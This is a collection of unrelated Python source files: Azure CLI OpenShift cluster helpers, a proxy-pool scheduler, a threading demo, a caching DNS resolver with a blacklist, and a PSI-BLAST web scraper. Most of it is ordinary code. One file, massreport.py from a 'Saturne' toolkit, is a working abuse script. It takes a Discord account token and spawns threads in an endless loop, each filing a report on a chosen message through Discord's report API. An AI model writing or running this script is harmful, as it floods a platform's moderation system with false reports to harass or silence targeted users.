logger.info('Created an AAD: %s', aad_client_app_id)
# Get the TenantID
if aad_tenant_id is None:
profile = Profile(cli_ctx=cli_ctx)
_, _, aad_tenant_id = profile.get_login_credentials()
return OpenShiftManagedClusterAADIdentityProvider(
client_id=aad_client_app_id,
secret=aad_client_app_secret,
tenant_id=aad_tenant_id,
kind='AADIdentityProvider',
customer_admin_group_id=customer_admin_group_id)
def _ensure_service_principal(cli_ctx,
service_principal=None,
client_secret=None,
subscription_id=None,
dns_name_prefix=None,
location=None,
name=None):
# TODO: This really needs to be unit tested.
rbac_client = get_graph_rbac_management_client(cli_ctx)
if not service_principal:
# --service-principal not specified, make one.
if not client_secret:
client_secret = _create_client_secret()
salt = binascii.b2a_hex(os.urandom(3)).decode('utf-8')
url = 'https://{}.{}.{}.cloudapp.azure.com'.format(salt, dns_name_prefix, location)
service_principal, _aad_session_key = _build_service_principal(rbac_client, cli_ctx, name, url, client_secret)
if not service_principal:
raise CLIError('Could not create a service principal with the right permissions. '
'Are you an Owner on this project?')
logger.info('Created a service principal: %s', service_principal)
        # add the role assignment first, before saving the service principal
if not _add_role_assignment(cli_ctx, 'Contributor', service_principal):
logger.warning('Could not create a service principal with the right permissions. '
'Are you an Owner on this project?')
else:
        # --service-principal specified, validate that --client-secret was too
if not client_secret:
raise CLIError('--client-secret is required if --service-principal is specified')
return {
'client_secret': client_secret,
'service_principal': service_principal,
}
def _create_client_secret():
    # Add a special character to satisfy AAD SP secret requirements
special_char = '$'
client_secret = binascii.b2a_hex(os.urandom(10)).decode('utf-8') + special_char
return client_secret
def _get_rg_location(ctx, resource_group_name, subscription_id=None):
groups = cf_resource_groups(ctx, subscription_id=subscription_id)
# Just do the get, we don't need the result, it will error out if the group doesn't exist.
rg = groups.get(resource_group_name)
return rg.location
def _check_cluster_autoscaler_flag(enable_cluster_autoscaler,
min_count,
max_count,
node_count,
agent_pool_profile):
if enable_cluster_autoscaler:
if min_count is None or max_count is None:
            raise CLIError('Please specify both min-count and max-count when --enable-cluster-autoscaler is enabled')
if int(min_count) > int(max_count):
raise CLIError('Value of min-count should be less than or equal to value of max-count')
if int(node_count) < int(min_count) or int(node_count) > int(max_count):
raise CLIError('node-count is not in the range of min-count and max-count')
agent_pool_profile.min_count = int(min_count)
agent_pool_profile.max_count = int(max_count)
agent_pool_profile.enable_auto_scaling = True
else:
if min_count is not None or max_count is not None:
            raise CLIError('min-count and max-count are only allowed together with --enable-cluster-autoscaler, please add that flag')
def _validate_autoscaler_update_counts(min_count, max_count, node_count, is_enable_or_update):
"""
Validates the min, max, and node count when performing an update
"""
if min_count is None or max_count is None:
if is_enable_or_update:
raise CLIError('Please specify both min-count and max-count when --enable-cluster-autoscaler or '
'--update-cluster-autoscaler is set.')
if min_count is not None and max_count is not None:
if int(min_count) > int(max_count):
raise CLIError('Value of min-count should be less than or equal to value of max-count.')
if int(node_count) < int(min_count) or int(node_count) > int(max_count):
raise CLIError("Current node count '{}' is not in the range of min-count and max-count.".format(node_count))
def _print_or_merge_credentials(path, kubeconfig, overwrite_existing, context_name):
"""Merge an unencrypted kubeconfig into the file at the specified path, or print it to
stdout if the path is "-".
"""
# Special case for printing to stdout
if path == "-":
print(kubeconfig)
return
# ensure that at least an empty ~/.kube/config exists
directory = os.path.dirname(path)
if directory and not os.path.exists(directory):
try:
os.makedirs(directory)
except OSError as ex:
if ex.errno != errno.EEXIST:
raise
if not os.path.exists(path):
with os.fdopen(os.open(path, os.O_CREAT | os.O_WRONLY, 0o600), 'wt'):
pass
# merge the new kubeconfig into the existing one
fd, temp_path = tempfile.mkstemp()
additional_file = os.fdopen(fd, 'w+t')
try:
additional_file.write(kubeconfig)
additional_file.flush()
merge_kubernetes_configurations(path, temp_path, overwrite_existing, context_name)
except yaml.YAMLError as ex:
logger.warning('Failed to merge credentials to kube config file: %s', ex)
finally:
additional_file.close()
os.remove(temp_path)
def _remove_nulls(managed_clusters):
"""
Remove some often-empty fields from a list of ManagedClusters, so the JSON representation
doesn't contain distracting null fields.
    This works around a quirk of the Python SDK's behavior. These fields are not sent
by the server, but get recreated by the CLI's own "to_dict" serialization.
"""
attrs = ['tags']
ap_attrs = ['os_disk_size_gb', 'vnet_subnet_id']
sp_attrs = ['secret']
for managed_cluster in managed_clusters:
for attr in attrs:
if getattr(managed_cluster, attr, None) is None:
delattr(managed_cluster, attr)
if managed_cluster.agent_pool_profiles is not None:
for ap_profile in managed_cluster.agent_pool_profiles:
for attr in ap_attrs:
if getattr(ap_profile, attr, None) is None:
delattr(ap_profile, attr)
for attr in sp_attrs:
if getattr(managed_cluster.service_principal_profile, attr, None) is None:
delattr(managed_cluster.service_principal_profile, attr)
return managed_clusters
def _remove_osa_nulls(managed_clusters):
"""
Remove some often-empty fields from a list of OpenShift ManagedClusters, so the JSON representation
doesn't contain distracting null fields.
    This works around a quirk of the Python SDK's behavior. These fields are not sent
by the server, but get recreated by the CLI's own "to_dict" serialization.
"""
attrs = ['tags', 'plan', 'type', 'id']
ap_master_attrs = ['name', 'os_type']
for managed_cluster in managed_clusters:
for attr in attrs:
if getattr(managed_cluster, attr, None) is None:
delattr(managed_cluster, attr)
for attr in ap_master_attrs:
if getattr(managed_cluster.master_pool_profile, attr, None) is None:
delattr(managed_cluster.master_pool_profile, attr)
return managed_clusters
def _validate_aci_location(norm_location):
"""
Validate the Azure Container Instance location
"""
aci_locations = [
"australiaeast",
"canadacentral",
"centralindia",
"centralus",
"eastasia",
"eastus",
"eastus2",
"eastus2euap",
"japaneast",
"northcentralus",
"northeurope",
"southcentralus",
"southeastasia",
"southindia",
"uksouth",
"westcentralus",
"westus",
"westus2",
"westeurope"
]
if norm_location not in aci_locations:
raise CLIError('Azure Container Instance is not available at location "{}".'.format(norm_location) +
' The available locations are "{}"'.format(','.join(aci_locations)))
def osa_list(cmd, client, resource_group_name=None):
if resource_group_name:
managed_clusters = client.list_by_resource_group(resource_group_name)
else:
managed_clusters = client.list()
return _remove_osa_nulls(list(managed_clusters))
def _format_workspace_id(workspace_id):
workspace_id = workspace_id.strip()
if not workspace_id.startswith('/'):
workspace_id = '/' + workspace_id
if workspace_id.endswith('/'):
workspace_id = workspace_id.rstrip('/')
return workspace_id
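# Illustrative sketch (not called anywhere): _format_workspace_id trims whitespace,
# ensures a single leading slash and drops a trailing slash. The resource ID below
# is made up for demonstration only.
def _format_workspace_id_example():
    raw = ' subscriptions/000/resourceGroups/rg/providers/Microsoft.OperationalInsights/workspaces/ws/ '
    formatted = _format_workspace_id(raw)
    assert formatted.startswith('/subscriptions/')
    assert not formatted.endswith('/')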
def openshift_create(cmd, client, resource_group_name, name, # pylint: disable=too-many-locals
location=None,
compute_vm_size="Standard_D4s_v3",
compute_count=3,
aad_client_app_id=None,
aad_client_app_secret=None,
aad_tenant_id=None,
vnet_prefix="10.0.0.0/8",
subnet_prefix="10.0.0.0/24",
vnet_peer=None,
tags=None,
no_wait=False,
workspace_id=None,
customer_admin_group_id=None,
management_subnet_cidr=None,
private_cluster=None):
if vnet_peer is not None:
        raise CLIError('Vnet peering is no longer supported during cluster creation. '
                       'Instead, it is possible to edit vnet properties after cluster creation.')
if location is None:
location = _get_rg_location(cmd.cli_ctx, resource_group_name)
agent_pool_profiles = []
agent_node_pool_profile = OpenShiftManagedClusterAgentPoolProfile(
name='compute', # Must be 12 chars or less before ACS RP adds to it
count=int(compute_count),
vm_size=compute_vm_size,
os_type="Linux",
role=OpenShiftAgentPoolProfileRole.compute,
subnet_cidr=subnet_prefix
)
if bool(private_cluster) != bool(management_subnet_cidr is not None):
raise CLIError('Both --private-cluster and --management-subnet-cidr need to be supplied or neither.')
api_properties = OpenShiftAPIProperties(
private_api_server=bool(private_cluster)
)
agent_infra_pool_profile = OpenShiftManagedClusterAgentPoolProfile(
name='infra', # Must be 12 chars or less before ACS RP adds to it
count=int(3),
vm_size="Standard_D4s_v3",
os_type="Linux",
role=OpenShiftAgentPoolProfileRole.infra,
subnet_cidr=subnet_prefix
)
agent_pool_profiles.append(agent_node_pool_profile)
agent_pool_profiles.append(agent_infra_pool_profile)
agent_master_pool_profile = OpenShiftManagedClusterMasterPoolProfile(
name='master', # Must be 12 chars or less before ACS RP adds to it
count=int(3),
vm_size="Standard_D4s_v3",
os_type="Linux",
subnet_cidr=subnet_prefix,
api_properties=api_properties
)
identity_providers = []
create_aad = False
    # Validate that the cluster does not already exist, since AAD rotation on OSA is not supported for now
try:
client.get(resource_group_name, name)
except CloudError:
        # Check whether aad_client_app_id, aad_client_app_secret and aad_tenant_id are set
if aad_client_app_id is None and aad_client_app_secret is None and aad_tenant_id is None:
create_aad = True
osa_aad_identity = _ensure_osa_aad(cmd.cli_ctx,
aad_client_app_id=aad_client_app_id,
aad_client_app_secret=aad_client_app_secret,
aad_tenant_id=aad_tenant_id, identifier=None,
name=name, create=create_aad,
customer_admin_group_id=customer_admin_group_id)
identity_providers.append(
OpenShiftManagedClusterIdentityProvider(
name='Azure AD',
provider=osa_aad_identity
)
)
auth_profile = OpenShiftManagedClusterAuthProfile(identity_providers=identity_providers)
default_router_profile = OpenShiftRouterProfile(name='default')
if workspace_id is not None:
workspace_id = _format_workspace_id(workspace_id)
monitor_profile = OpenShiftManagedClusterMonitorProfile(enabled=True, workspace_resource_id=workspace_id) # pylint: disable=line-too-long
else:
monitor_profile = None
network_profile = NetworkProfile(vnet_cidr=vnet_prefix, management_subnet_cidr=management_subnet_cidr)
osamc = OpenShiftManagedCluster(
location=location, tags=tags,
open_shift_version="v3.11",
network_profile=network_profile,
auth_profile=auth_profile,
agent_pool_profiles=agent_pool_profiles,
master_pool_profile=agent_master_pool_profile,
router_profiles=[default_router_profile],
monitor_profile=monitor_profile)
try:
# long_running_operation_timeout=300
result = sdk_no_wait(no_wait, client.create_or_update,
resource_group_name=resource_group_name, resource_name=name, parameters=osamc)
result = LongRunningOperation(cmd.cli_ctx)(result)
instance = client.get(resource_group_name, name)
_ensure_osa_aad(cmd.cli_ctx,
aad_client_app_id=osa_aad_identity.client_id,
aad_client_app_secret=osa_aad_identity.secret,
aad_tenant_id=osa_aad_identity.tenant_id, identifier=instance.public_hostname,
name=name, create=create_aad)
except CloudError as ex:
if "The resource type could not be found in the namespace 'Microsoft.ContainerService" in ex.message:
raise CLIError('Please make sure your subscription is whitelisted to use this service. https://aka.ms/openshift/managed') # pylint: disable=line-too-long
if "No registered resource provider found for location" in ex.message:
raise CLIError('Please make sure your subscription is whitelisted to use this service. https://aka.ms/openshift/managed') # pylint: disable=line-too-long
raise ex
def openshift_update(cmd, client, resource_group_name, name, refresh_cluster=None, no_wait=False):
instance = client.get(resource_group_name, name)
if refresh_cluster:
instance.refresh_cluster = True
return sdk_no_wait(no_wait, client.create_or_update, resource_group_name, name, instance)
def openshift_show(cmd, client, resource_group_name, name):
mc = client.get(resource_group_name, name)
return _remove_osa_nulls([mc])[0]
def openshift_scale(cmd, client, resource_group_name, name, compute_count, no_wait=False):
instance = client.get(resource_group_name, name)
# TODO: change this approach when we support multiple agent pools.
idx = 0
for i in range(len(instance.agent_pool_profiles)):
if instance.agent_pool_profiles[i].name.lower() == "compute":
idx = i
break
instance.agent_pool_profiles[idx].count = int(compute_count) # pylint: disable=no-member
    # null out the AAD profile and manually add the master agent pool name because otherwise validation complains
instance.master_pool_profile.name = "master"
instance.auth_profile = None
return sdk_no_wait(no_wait, client.create_or_update, resource_group_name, name, instance)
def openshift_monitor_enable(cmd, client, resource_group_name, name, workspace_id, no_wait=False):
instance = client.get(resource_group_name, name)
workspace_id = _format_workspace_id(workspace_id)
monitor_profile = OpenShiftManagedClusterMonitorProfile(enabled=True, workspace_resource_id=workspace_id) # pylint: disable=line-too-long
instance.monitor_profile = monitor_profile
return sdk_no_wait(no_wait, client.create_or_update, resource_group_name, name, instance)
def openshift_monitor_disable(cmd, client, resource_group_name, name, no_wait=False):
instance = client.get(resource_group_name, name)
monitor_profile = OpenShiftManagedClusterMonitorProfile(enabled=False, workspace_resource_id=None) # pylint: disable=line-too-long
instance.monitor_profile = monitor_profile
return sdk_no_wait(no_wait, client.create_or_update, resource_group_name, name, instance)
|
massreport.py
|
###############################################################
# ███████╗ █████╗ ████████╗██╗ ██╗██████╗ ███╗ ██╗███████╗
# ██╔════╝██╔══██╗╚══██╔══╝██║ ██║██╔══██╗████╗ ██║██╔════╝
# ███████╗███████║ ██║ ██║ ██║██████╔╝██╔██╗ ██║█████╗
# ╚════██║██╔══██║ ██║ ██║ ██║██╔══██╗██║╚██╗██║██╔══╝
# ███████║██║ ██║ ██║ ╚██████╔╝██║ ██║██║ ╚████║███████╗
# ╚══════╝╚═╝ ╚═╝ ╚═╝ ╚═════╝ ╚═╝ ╚═╝╚═╝ ╚═══╝╚══════╝
###############################################################
# Crée par GalackQSM
# Github: https://github.com/GalackQSM/Saturne
# Discord: https://discord.gg/saturnetools|XvjJpw4D3m
# © 2022 Saturne
###############################################################
import requests
import threading
from colorama import Fore
def MassReport(token, guild_id1, channel_id1, message_id1, reason1):
for i in range(500, 1000):
while True:
threading.Thread(target=Report, args=(token, guild_id1, channel_id1, message_id1, reason1)).start()
def Report(token, guild_id1, channel_id1, message_id1, reason1):
Responses = {
'401: Unauthorized': f'{Fore.RED}Token Discord invalide.',
'Missing Access': f'{Fore.RED}Accès manquant au salon ou au serveur.',
'Vous devez vérifier votre compte pour effectuer cette action.': f'{Fore.RED} Non vérifié.'
}
report = requests.post(
'https://discordapp.com/api/v8/report', json={
'channel_id': channel_id1,
'message_id': message_id1,
'guild_id': guild_id1,
'reason': reason1
}, headers={
'Accept': '*/*',
'Accept-Encoding': 'gzip, deflate',
'Accept-Language': 'sv-SE',
'User-Agent': 'Discord/21295 CFNetwork/1128.0.1 Darwin/19.6.0',
'Content-Type': 'application/json',
'Authorization': token
}
)
if (status := report.status_code) == 201:
print(f"{Fore.GREEN}Rapport envoyé avec succès!\n")
elif status in (401, 403):
print(Responses[report.json()['message']]+"\n")
else:
print(f"{Fore.RED}Erreur: {report.text} | Code d'état: {status}\n")
|
scheduler.py
|
import time
from multiprocessing import Process
from proxypool.api import app
from proxypool.getter import Getter
from proxypool.tester import Tester
from proxypool.db import RedisClient
from proxypool.setting import *
class Scheduler():
def schedule_tester(self, cycle=TESTER_CYCLE):
"""
定时测试代理
"""
tester = Tester()
while True:
            print('Tester is starting')
tester.run()
time.sleep(cycle)
def schedule_getter(self, cycle=GETTER_CYCLE):
"""
定时获取代理
"""
getter = Getter()
while True:
            print('Starting to fetch proxies')
getter.run()
time.sleep(cycle)
def schedule_api(self):
"""
开启API
"""
app.run(API_HOST, API_PORT)
def run(self):
        print('Proxy pool is starting')
if TESTER_ENABLED:
tester_process = Process(target=self.schedule_tester)
tester_process.start()
if GETTER_ENABLED:
getter_process = Process(target=self.schedule_getter)
getter_process.start()
if API_ENABLED:
api_process = Process(target=self.schedule_api)
api_process.start()
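# Usage sketch (assumption: the module is launched directly, mirroring the upstream
# proxypool project's entry point); this guard is not part of the original file.
if __name__ == '__main__':
    scheduler = Scheduler()
    scheduler.run()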
|
1.py
|
import threading
from time import sleep,ctime
loops=[2,4]
class ThreadFunc(object):
def __init__(self,func,args,name=''):
self.name=name
self.func=func
self.args=args
def __call__(self):
self.res=self.func(*self.args)
def loop(nloop,nsec):
print 'start loop',nloop,'at:',ctime()
sleep(nsec)
print 'loop',nloop,'done at:',ctime()
def main():
print 'starting at:',ctime()
threads=[]
nloops=range(len(loops))
print nloops
print range(len(loops))
for i in nloops:
t=threading.Thread(target=ThreadFunc(loop,(i,loops[i]),loop.__name__))
threads.append(t)
for i in nloops:
threads[i].start()
for i in nloops:
threads[i].join()
print 'all done at:',ctime()
if __name__=='__main__':
main()
|
server.py
|
#!/usr/bin/env python3
import dns.exception
import dns.flags
import dns.message
import dns.rcode
import dns.rdataclass
import dns.rdatatype
import dns.resolver
import json
import math
import os
import pickle
import redis
import socket
import socketserver
import struct
import sys
import threading
import time
allowed_rdtypes = [
dns.rdatatype.A,
dns.rdatatype.AAAA,
dns.rdatatype.MX,
dns.rdatatype.NS,
dns.rdatatype.SOA,
dns.rdatatype.SRV,
dns.rdatatype.CNAME,
dns.rdatatype.PTR,
dns.rdatatype.CAA,
]
class DomainTrie:
def __init__(self):
self.root = {}
self.end_symbol = 0
def add(self, domain, status):
ref = self.root
for index, part in enumerate(reversed(domain.split('.'))):
if index == 0 and not part:
continue
if part not in ref:
ref[part] = {}
ref = ref[part]
ref[self.end_symbol] = status
def lookup(self, domain):
ref = self.root
status = False
for index, part in enumerate(reversed(domain.split('.'))):
if index == 0 and not part:
continue
if part not in ref:
break
try:
ref = ref[part]
status = ref.get(self.end_symbol, status)
except KeyError:
break
return status
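# Illustrative sketch (not called anywhere): the trie stores blacklist entries as True
# and whitelist entries as False, and lookup() returns the status attached to the
# longest matching domain suffix. The domain names below are made up.
def _domain_trie_example():
    trie = DomainTrie()
    trie.add('ads.example.com', True)       # blacklist a whole subtree
    trie.add('ok.ads.example.com', False)   # carve a whitelisted branch back out
    assert trie.lookup('tracker.ads.example.com.') is True
    assert trie.lookup('ok.ads.example.com.') is False
    assert trie.lookup('example.com.') is False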
def setup_nameservers():
if 'nameservers' in config:
dns.resolver.default_resolver = dns.resolver.Resolver(configure=False)
dns.resolver.default_resolver.nameservers = config['nameservers']
def get_config(conf=None):
if conf is None:
config = {}
else:
with open(conf) as f:
config = json.load(f)
config['domains'] = DomainTrie()
for domain in config.get('blacklist', []):
config['domains'].add(domain.encode('idna').decode(), True)
for domain in config.get('whitelist', []):
config['domains'].add(domain.encode('idna').decode(), False)
if 'redis_socket_file' not in config:
for sockfile in [
'/var/run/redis/redis.sock',
'/var/run/redis/redis-server.sock',
]:
if os.path.exists(sockfile):
config['redis_socket_file'] = sockfile
break
else:
raise Exception('Unable to find redis socket path')
config.setdefault('ratelimits', {})
config.setdefault('port', 53)
config['ratelimits'].setdefault('limit', 20)
config['ratelimits'].setdefault('limit_burst', 4)
config['ratelimits'].setdefault('enabled', True)
return config
def ratelimited(ip):
if '.' in ip[-4:]:
# convert IPv6-mapped IPv4 address to pure IPv4 address.
key = 'dns:r:4:%s' % ip[ip.rfind(':') + 1 :]
else:
# IPv6 /112 subnet
key = 'dns:r:6:%s' % socket.inet_pton(socket.AF_INET6, ip)[:-2]
limit = config['ratelimits']['limit']
limit_burst = config['ratelimits']['limit_burst']
ratio = limit / limit_burst
rl_params = redis_conn.get(key)
current_time = time.time()
if rl_params:
access_time, tokens = pickle.loads(rl_params)
tokens = min(limit, tokens + limit_burst * (current_time - access_time))
else:
access_time, tokens = current_time, limit
redis_conn.set(key, pickle.dumps((current_time, max(0, tokens - 1))))
redis_conn.expire(key, math.ceil(ratio))
return tokens < 1
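# Illustrative sketch of the token-bucket maths used above, without Redis (the numbers
# mirror the defaults: a bucket of limit=20 tokens, refilled at limit_burst=4 tokens
# per second, one token spent per query); not called anywhere.
def _token_bucket_example():
    limit, limit_burst = 20, 4
    access_time, tokens = time.time() - 2.0, 0.0   # bucket drained two seconds ago
    tokens = min(limit, tokens + limit_burst * (time.time() - access_time))
    # roughly 8 tokens have been refilled, so the next query would be allowed (tokens >= 1)
    return tokens < 1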
def dns_query(name, rdclass, rdtype):
if rdclass != dns.rdataclass.IN or rdtype not in allowed_rdtypes:
return (dns.rcode.REFUSED, [], [], [])
try:
key = 'dns:q:%s:%i' % (name, rdtype)
cached_result = redis_conn.get(key)
if cached_result is not None:
return pickle.loads(cached_result)
if config['domains'].lookup(name):
rv = (dns.rcode.NXDOMAIN, [], [], [])
expiration = 0
else:
result = dns.resolver.query(name, rdtype, raise_on_no_answer=False)
response = result.response
rv = (
response.rcode(),
response.answer,
response.authority,
response.additional,
)
            expiration = max(60, min(int(result.expiration - time.time()), 3600))  # cache for the remaining TTL, clamped to [60, 3600] seconds
except dns.exception.DNSException as e:
expiration = 60
if isinstance(e, dns.resolver.NXDOMAIN):
rcode = dns.rcode.NXDOMAIN
elif isinstance(e, dns.resolver.NoMetaqueries):
rcode = dns.rcode.REFUSED
else:
rcode = dns.rcode.SERVFAIL
rv = (rcode, [], [], [])
if expiration > 0:
redis_conn.set(key, pickle.dumps(rv))
redis_conn.expire(key, expiration)
return rv
def make_response(query):
response = dns.message.Message(query.id)
response.flags = dns.flags.QR | dns.flags.RA | (query.flags & dns.flags.RD)
response.set_opcode(query.opcode())
response.question = list(query.question)
return response
def handle_query(raw_data, client_ip):
try:
query = dns.message.from_wire(raw_data)
except dns.exception.DNSException:
return
if len(query.question) != 1:
return
if config['ratelimits']['enabled'] and ratelimited(client_ip):
return
name = str(query.question[0].name).lower()
rdtype = query.question[0].rdtype
rdclass = query.question[0].rdclass
result = dns_query(name, rdclass, rdtype)
response = make_response(query)
response.set_rcode(result[0])
response.answer = result[1]
response.authority = result[2]
response.additional = result[3]
return response
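# Illustrative sketch (not called anywhere): building the wire-format query that
# handle_query() expects. The client IP is a documentation address; a real call also
# needs the module-level `config` and `redis_conn` globals to be initialised.
def _handle_query_example():
    query = dns.message.make_query('example.com.', dns.rdatatype.A)
    raw_data = query.to_wire()
    # response = handle_query(raw_data, '203.0.113.10')
    return raw_data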
class UDPHandler(socketserver.BaseRequestHandler):
    def handle(self):
        raw_data, sock = self.request  # unpack payload and socket; avoid shadowing the socket module
        response = handle_query(raw_data, self.client_address[0])
        if response is None:
            return
        raw_response = response.to_wire()
        if len(raw_response) <= 512:
            sock.sendto(raw_response, self.client_address)
        else:
            # too large for a plain UDP reply: mark it truncated so the client retries over TCP
            response.flags |= dns.flags.TC
            sock.sendto(response.to_wire()[:512], self.client_address)
class TCPHandler(socketserver.BaseRequestHandler):
    def handle(self):
        sock = self.request  # avoid shadowing the socket module
        try:
            query_length_bytes = sock.recv(2)
            query_length = struct.unpack('!H', query_length_bytes)
            raw_data = sock.recv(query_length[0])
            response = handle_query(raw_data, self.client_address[0])
            if response is not None:
                raw_response = response.to_wire()
                response_length_bytes = struct.pack('!H', len(raw_response))
                sock.send(response_length_bytes + raw_response)
        except (struct.error, OSError):
            pass
        finally:
            sock.close()
class ThreadedUDPServer(socketserver.ThreadingMixIn, socketserver.UDPServer):
pass
class ThreadedTCPServer(socketserver.ThreadingMixIn, socketserver.TCPServer):
pass
def run_server():
for server_class in [ThreadedUDPServer, ThreadedTCPServer]:
server_class.allow_reuse_address = True
server_class.address_family = socket.AF_INET6
udp_server = ThreadedUDPServer(('', config['port']), UDPHandler)
tcp_server = ThreadedTCPServer(('', config['port']), TCPHandler)
udp_server_thread = threading.Thread(target=udp_server.serve_forever)
tcp_server_thread = threading.Thread(target=tcp_server.serve_forever)
try:
for thread in [udp_server_thread, tcp_server_thread]:
thread.start()
for thread in [udp_server_thread, tcp_server_thread]:
thread.join()
except (KeyboardInterrupt, SystemExit):
pass
finally:
for server in [udp_server, tcp_server]:
server.shutdown()
server.server_close()
if __name__ == '__main__':
if len(sys.argv) < 2:
config = get_config()
else:
config = get_config(sys.argv[1])
redis_conn = redis.StrictRedis(unix_socket_path=config['redis_socket_file'])
setup_nameservers()
run_server()
|
finalpsyblast.py
|
#!/usr/bin/env python
'''
phyST
This program takes a protein family code (i.e. 1.A.1) as input, then
searches for the alignment sequence of the first protein in that
family (i.e. 1.A.1.1.1), then psi-blasts this sequence, and finally
outputs the number of protein homologues from every phylum found as
well as the average sequence length of these homologues
NOTE: TO CREATE CLUSTAL OUTPUT (.FLAT FILE) MAKE A FOLDER CALLED
"clustalout" IN THE SAME DIRECTORY AS THE SCRIPT.
'''
# Written by Hari Krishnan, Larry Chau
# lchau@ucsd.edu - larrymchau@gmail.com
# hkkrishn563@gmail.com - hkkrishn@ucsd.edu
import mechanize
import sys,re,os
import urllib2
import tempfile
from Bio import Entrez
from bs4 import BeautifulSoup
from time import sleep
import cookielib
import math
import multiprocessing as mp
import optparse
import ctypes
#Specify the user's email when using Entrez from Bio package
Entrez.email = "lchau@ucsd.edu"
#Globals, working data
interval = 0
br = mechanize.Browser()
tfiles = []
lo_cutoff = 50
eValue = '0.0001'
alignment = ''
def browser_init():
global br
cj = cookielib.LWPCookieJar()
br.set_cookiejar(cj)
br.set_handle_equiv(True)
br.set_handle_redirect(True)
br.set_handle_referer(True)
br.set_handle_robots(False)
br.set_handle_refresh(mechanize._http.HTTPRefreshProcessor(), max_time=1)
br.addheaders = [('User-agent', 'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.1) \
Gecko/2008071615 Fedora/3.0.1-1.fc9 Firefox/3.0.1')]
#Code copied from protocol1.py
def wait():
global interval
global br
text = re.compile('This page will be automatically updated in <b>(\d+)<\/b> seconds?')
time = text.search(br.response().read())
if bool(time):
seconds = int(time.groups()[0])
secs = seconds if seconds < 15 else 10
if(interval >= 15):
interval = 0
print ' waited 15 seconds...'
interval = interval + secs
sleep(secs)
return True
return False
#Code copied from protocol1.py
def loop():
global br
if wait():
br.select_form(nr=0)
br.submit()
loop()
return
def find_optimal():
global br
global alignment
br.open('http://www.tcdb.org/progs/blast.php')
br.select_form(nr=1)
br.form['BLAST'] = ['blastp']
br.form['SEQUENCE'] = alignment
br.form['EXPECT'] = ['1000']
br.form['DESCRIPTIONS'] = ['200']
response1 = br.submit().read()
response1 = response1.split('<pre>')[2]
text = re.split('<a href="/search/result.php\?tc=\d+.\D+.\d+">',response1)
del text[0]
for i in range(0,len(text)):
family = text[i].split('</a>')[0]
#only match substring to tcdb family code
if proteinCode != family[:len(proteinCode)]:
if (i != 0): optimEVal = text[i-1].split('</a>')[2].split('<a href="')[0].strip()
break
nums = optimEVal.split('e')
if(1 < len(nums)):
        if(not re.match('\d',nums[0])): nums[0] = '1'
optimEVal = float(nums[0])*(10**float(nums[1]))
else: optimEVal = float(nums[0])
optimEVal = '%.9f' %optimEVal
return optimEVal
def blast(proteinCode):
global eValue
global alignment
global br
browser_init()
#Puts the family code into tcdb.org and search
br.open('http://www.tcdb.org/')
br.select_form(nr=0)
br.form.set_all_readonly(False)
br.form['query'] = proteinCode
br.submit()
if (len(proteinCode.split('.')) < 4):
        #Clicks the link containing text "View Proteins belonging to blah"
link = br.click_link(text_regex = "View Proteins belonging to: ")
br.open(link)
#Click on the first subfamily on the subfamily list.
cnt = 0
while True:
link = br.click_link(text_regex = '\d+.\D+.\d.\d.\d', nr= cnt)
response = br.open(link)
            # In case clicking "View proteins" does not land on a protein's
            # info page, skip the first subfamily and go to the next one, etc.
try:
#The expected FASTA page is the link with text "FASTA
# formatted sequence", which contains url regex "fasta.php"
link = br.click_link(url_regex = "fasta.php")
break
except mechanize._mechanize.LinkNotFoundError:
#If the page does not contain "fasta.php", skip to the next
# subfamily
br.back()
cnt = cnt + 1
    #click into the FASTA formatted sequence, then split texts to
    # extract the string containing only the alignment sequence
sourcePage = br.open(link)
keyLines = sourcePage.read().split('<PRE>')[1]
keyLines = keyLines.split('</PRE>')[0]
keyLines = keyLines.split('\n')
del keyLines[0]
for row in keyLines:
alignment = alignment + row
optimEVal = find_optimal()
    print ' Estimated Optimal E-Value (TCDB):',optimEVal,'(i.e.',float(optimEVal),')'
print ' Using:',eValue
eValue = eValue.replace(' ', '')
#Go to NCBI blast page, enter the alignment found above, select
# "psi-blast" and "5000" max results", then blast
br.open('http://blast.ncbi.nlm.nih.gov/Blast.cgi?PROGRAM=blastp&BLAST_PROGRAMS=blastp&PAGE_TYPE=BlastSearch&SHOW_DEFAULTS=on&LINK_LOC=blasthome')
br.select_form(nr=0)
br.form.set_all_readonly(False)
br.form['SELECTED_PROG_TYPE'] = 'psiBlast'
br.form['RUN_PSIBLAST'] = 'on'
br.form['BLAST_PROGRAMS'] = ['psiBlast']
br.form['QUERY'] = alignment
br.form['I_THRESH'] = eValue
br.form['MAX_NUM_SEQ'] = ['10000']
br.submit()
print " Blasting Off..."
loop()
print " Done.\n"
# To explain this code a little more: it is easier to write the response
# to an html file and submit that file using mechanize parameters, since
# there does not seem to be any inherent support for following a response
# that has no link. In this case, the blast returns a custom source page
# through the CGI script, so the only way to submit the content again
# is to hard-code the response, as is done here.
def iterate():
global br
global tfiles
results = br.response().read()
#results = open('out.html','r').read()
results = results.replace('<! --','<!--')
file = open('out.html','w')
file.write(results)
myres = tempfile.NamedTemporaryFile(mode='w+t',suffix='.html', delete=False)
myres.write(results)
myres.seek(0), myres.flush()
br.open_local_file(myres.name)
myres.close()
# find and select form
formcount=0
for form in br.forms():
if 'name' in form.attrs:
if form.attrs['name'] == 'overview0':
print form.attrs['name']
print 'id={0}'.format(formcount)
br.form = form
break
formcount=formcount+1
br.select_form(nr=formcount)
print br.form
'''
if 'id' in form.attrs:
if form.attrs['id'] == 'smrtBlastForm':
print form.attrs['id']
print 'id={0}'.format(formcount)
br.form = form
break
formcount=formcount+1
if 'name' in form.attrs:
if form.attrs['name'] == 'overview0':
print form.attrs['name']
print 'id={0}'.format(formcount)
br.form = form
break
formcount=formcount+1
'''
br.form.action='http://blast.ncbi.nlm.nih.gov/Blast.cgi'
br.submit()
file = open('out2.html','w')
file.write(br.response().read())
loop()
file = open('out3.html','w')
file.write(br.response().read())
tfiles.append(myres.name)
return
def close():
global tfiles
for item in tfiles:
os.remove(item)
def process_data(process, keyLines, dataQueue, phylumQueue, sequencesQueue, invalidQueue, cutoff):
invalidProteins = 0
minLength = int((len(keyLines)*0.25)*process)
maxLength = int((len(keyLines)*0.25)*(process+1))
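    # The fixed 25% slices assume exactly four worker processes, matching the
    # range(0,4) used when the jobs are spawned in fetch_results().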
counter = 0
#For each link containing the accession number as link
for item in keyLines[minLength:maxLength]:
#Extract the e-value
eValue = (item.split('<td>')[4]).split(' </td')[0]
eValue = float(eValue.strip('\n'))
#Extract the accession number
accessionNum = (item.split('Show report for ')[1]).split('"')[0]
#Use efetch() to fetch info of this accession number, from database
